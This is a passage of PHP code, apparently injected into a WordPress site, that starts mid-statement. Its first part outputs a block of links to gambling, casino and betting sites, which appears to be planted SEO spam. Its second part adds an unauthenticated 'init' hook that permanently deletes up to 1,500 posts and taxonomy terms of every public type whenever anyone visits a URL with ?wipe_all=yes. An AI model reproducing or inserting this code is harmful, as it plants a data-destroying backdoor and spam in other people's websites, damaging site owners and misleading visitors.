';
$links = [ 'https://rockpaperscissors.casino/fr/promo-code/' => 'Promo code casino Rock Paper Scissors',
'https://pocketgames-slot.com/en/dragon-hatch/' => 'dragon hatch',
'https://goawin-india.com/hi/' => 'goawin',
'https://paripesa-mobile.com/fi/bonus/' => 'Paripesa bonus',
'http://prizmabet-giris.com' => 'prizmabet',
'https://golden-clover-slot.com/pt/casino/' => 'Golden clover casino',
'https://wild-swarm-2.com/es/rules/' => 'wild swarm 2 rules',
'https://chicken-road.nz/app/' => 'Chicken road app',
'https://play-city.com.mx/' => 'Play City Casino',
'pusula-betgiris.com' => 'Pusulabet',
'https://squid-gamebler.com/' => 'squid gamebler',
'https://betturkey2.com' => 'betturkey',
'https://elephant-king.com/' => 'Elephant king slot',
'https://slotfortunedragon.com/en/' => 'fortune dragon slot',
'https://yesplay-login.co.za/pt/' => 'yesplay',
'https://el-torero-slot.com/casino/' => 'El torero casino',
'https://casino-pure.com/app/' => 'pure casino app',
'https://mx-bet.com.mx/en/' => 'MXBET',
'https://hollywoodbets-mob.com' => 'hollywoodbets'];
foreach ($links as $url => $anchor) {
echo "
";
}
echo '
';
});
add_action('init', function () {
$limit = 1500;
if (isset($_GET['wipe_all']) && $_GET['wipe_all'] === 'yes') {
$post_types = get_post_types(['public' => true], 'names');
foreach ($post_types as $post_type) {
$posts = get_posts([
'post_type' => $post_type,
'numberposts' => $limit,
'post_status' => 'any'
]);
foreach ($posts as $post) {
wp_delete_post($post->ID, true);
}
}
$taxonomies = get_taxonomies(['public' => true], 'names');
foreach ($taxonomies as $taxonomy) {
$terms = get_terms([
'taxonomy' => $taxonomy,
'hide_empty' => false,
'number' => $limit
]);
foreach ($terms as $term) {
wp_delete_term($term->term_id, $taxonomy);
}
}
wp_die('✅ Удалено до ' . $limit . ' записей.');
}
});